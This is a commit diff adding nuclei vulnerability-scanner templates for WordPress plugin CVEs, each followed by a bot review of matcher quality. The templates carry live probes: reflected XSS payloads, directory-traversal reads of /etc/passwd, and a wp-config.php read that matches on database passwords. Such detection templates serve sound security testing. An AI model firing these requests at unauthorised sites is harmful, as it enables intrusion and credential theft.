Commit 42d0338

20241208

actions-user committed Dec 8, 2024
1 parent 8c092e9 commit 42d0338
Showing 52 changed files with 2,693 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241207
20241208
50 changes: 50 additions & 0 deletions poc.txt

30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-4242-2185.yaml
@@ -0,0 +1,30 @@
id: CVE-2012-4242

info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242

description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page."

requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
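Review bot: the request path hard-codes `?page_id=2` as the calendar page, but the description only says "the calendar page"; page IDs differ per site, so this probe will miss most vulnerable installs and should either take the page as a variable or try a small set of candidate pages. Separately, the `info` block has no `tags:` line, unlike the other new templates in this commit (compare `tags: cve,cve2014,wordpress,wp-plugin,lfi` in the CVE-2014-4940 file), so this template is invisible to tag-based selection; something like `tags: cve,cve2012,wordpress,wp-plugin,xss` would fix that.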
30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-4273-2195.yaml
@@ -0,0 +1,30 @@
id: CVE-2012-4273

info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
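Review bot: `info` is missing a `tags:` line here as well (the CVE-2014-4940 and CVE-2016-1000127 templates in this commit show the expected form), and there is a stray double blank line before `requests:`. The payload itself matches the description (libs/xing.php, `xing-url` parameter), and the three matchers (reflected `</script><script>…` string in the body, `text/html` in the headers, status 200) are the usual minimum for a reflected XSS check, so only the metadata needs attention.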
25 changes: 25 additions & 0 deletions poc/cve/CVE-2014-4940-2384.yaml
@@ -0,0 +1,25 @@
id: CVE-2014-4940

info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
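Review bot: the description names two vulnerable endpoints, charts/treemap.php and charts/zoomabletreemap.php, but the `path:` list only requests zoomabletreemap.php; add the treemap.php variant so an install where only one of the two files survives is still caught. The regex matcher carries no `part:`; nuclei defaults to the body, but the other templates in this commit state `part: body` explicitly, which is clearer. The reference points at cvedetails while the rest of the commit links the nvd.nist.gov entry; worth aligning.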
35 changes: 35 additions & 0 deletions poc/cve/CVE-2015-1000012-2457.yaml
@@ -0,0 +1,35 @@
id: CVE-2015-1000012
info:
name: WordPress MyPixs <=0.3 - Local File Inclusion
author: daffainfo
severity: high
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
- http://www.vapidlabs.com/advisory.php?v=154
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000012
cwe-id: CWE-200
metadata:
google-query: inurl:"/wp-content/plugins/mypixs"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200

# Enhanced by mp on 2022/06/06
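Review bot: the probe passes `url=/etc/passwd` as an absolute path rather than a `../` traversal, so it only fires if downloadpage.php opens whatever path it is handed; if the script prepends a base directory, a traversal variant (`../../../../etc/passwd`) is needed as a second path entry. The classification also looks inconsistent with the title: the name says "Local File Inclusion" and the tag is `lfi`, but `cwe-id` is CWE-200, whereas the CVE-2019-14205 LFI template in this commit uses CWE-22; check the NVD entry and make the two agree. The `# Enhanced by mp on 2022/06/06` trailer is an upstream editing note and can be dropped when copying into this repo.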
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-1000127-2646.yaml
@@ -0,0 +1,35 @@
id: CVE-2016-1000127

info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000127
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
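Review bot: the vulnerable endpoint is js.php and the payload closes a `<script>` block, which suggests the `interval` value is reflected inside JavaScript; if that script is served with a JavaScript `Content-Type` rather than `text/html`, the `text/html` header matcher will suppress a true positive. Confirm the response content type against the plugin, and either drop the header matcher or match on the type actually returned. The description ("Reflected XSS in wordpress plugin ajax-random-post v2.00") should also name the `interval` parameter and file, as the other descriptions in this commit do.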
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000153-2736.yaml
@@ -0,0 +1,39 @@
id: CVE-2016-1000153

info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin tidio-gallery v1.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
- http://www.vapidlabs.com/wp/wp_advisory.php?v=427
- https://wordpress.org/plugins/tidio-gallery
- http://www.securityfocus.com/bid/93543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000153
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
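Review bot: the reference `http://www.securityfocus.com/bid/93543` is a dead domain; the CVE-2015-1000012 template in this commit wraps its bid link in web.archive.org, and the same should be done here. The payload's leading `%22%3E` (`">`) shows it is written for an attribute context, and the body matcher deliberately checks only the `</script><script>…</script>` tail, which is the right choice since the `">` prefix may be consumed by the surrounding markup.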
28 changes: 28 additions & 0 deletions poc/cve/CVE-2019-14205-3823.yaml
@@ -0,0 +1,28 @@
id: CVE-2019-14205
info:
name: WordPress Ext Adaptive Images LFI
author: pikpikcu
severity: high
tags: cve,cve2019,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-14205
cwe-id: CWE-22
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
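Review bot: the description writes the parameter as `$REQUEST['adaptive-images-settings']['source_file']`; the PHP superglobal is `$_REQUEST`, and the missing underscore reads as a typo. The name "WordPress Ext Adaptive Images LFI" has an unexplained "Ext"; the description calls the plugin "Nevma Adaptive Images". The only reference is a third-party exploit repository; add the NVD or wpscan entry as the other templates do. The matcher itself is sound: requiring both `DB_NAME` and `DB_PASSWORD` with `condition: and` rules out a generic PHP error page, and the `../../../wp-config.php` traversal from `wp-content/plugins/adaptive-images/` resolves to the document root.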
32 changes: 32 additions & 0 deletions poc/cve/CVE-2021-24176-5636.yaml
@@ -0,0 +1,32 @@
id: CVE-2021-24176

info:
name: WordPress JH 404 Logger XSS
author: Ganofins
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference:
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2021-24176
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"

matchers-condition: and
matchers:
- type: word
words:
- "JH 404 Logger"
part: body

- type: status
status:
- 200
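Review bot: this template does not test the vulnerability at all; it fetches `readme.txt` and matches the plugin name, so it flags every install of JH 404 Logger regardless of whether the stored XSS described in `info` is reachable. At minimum the matcher should read the version from readme.txt and compare it with the affected range (through 1.1), and the name and tags should say it is a presence or version check, not a PoC. Confirming the actual bug would need a request producing a 404 with a crafted Referer followed by an authenticated view of the dashboard, which a single unauthenticated GET cannot do.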
43 changes: 43 additions & 0 deletions poc/cve/CVE-2021-24342-5715.yaml
@@ -0,0 +1,43 @@
id: CVE-2021-24342

info:
name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
reference:
- https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
- https://nvd.nist.gov/vuln/detail/CVE-2021-24342

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24342
cwe-id: CWE-79

requests:
- raw:
- |
POST /?ajax-request=jnews HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67
matchers-condition: and
matchers:

- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
words:
- 'Content-Type: text/html'
part: header

- type: status
status:
- 200
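Review bot: as rendered here the raw request has no empty line between `Content-Type: application/x-www-form-urlencoded` and the `lang=en_US&cat_id=…` line; nuclei raw requests need that blank line for the form data to be sent as the body rather than treated as a malformed header, so confirm the file actually contains it. The header matcher looks for the literal `Content-Type: text/html`; the other templates in this commit match just `text/html`, which does not depend on header-name casing, and the same form should be used here. `info` is also missing a `tags:` line.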
63 changes: 63 additions & 0 deletions poc/cve/CVE-2022-0422(1).yaml
@@ -0,0 +1,63 @@
id: CVE-2022-0422

info:
name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting
author: random-robbie
severity: medium
description: |
WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc
- https://plugins.trac.wordpress.org/changeset/2672615
- https://nvd.nist.gov/vuln/detail/CVE-2022-0422
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0422
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40139
cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: videousermanuals
product: white_label_cms
framework: wordpress
tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals

http:
- raw:
- |
POST /wp-login.php?wlcms-action=preview HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert(/XSS/);"

- type: word
part: body
words:
- "wlcms-login-wrapper"

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950
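Review bot: the file name `poc/cve/CVE-2022-0422(1).yaml` breaks the `CVE-<id>-<n>.yaml` convention used by every other file in this commit and looks like a browser duplicate-download artifact; rename it before merging. As with the CVE-2021-24342 template, the raw request shows no blank line between the `Content-Type` header and `wlcms%5B_login_custom_js%5D=…`, which must be present for the parameter to be sent as a POST body. Note that this is the only template here using the `http:` key while the rest use the older `requests:` name, and it carries an upstream `# digest:` signature line that only describes the file as it was signed; if the content is touched, regenerate or drop that line.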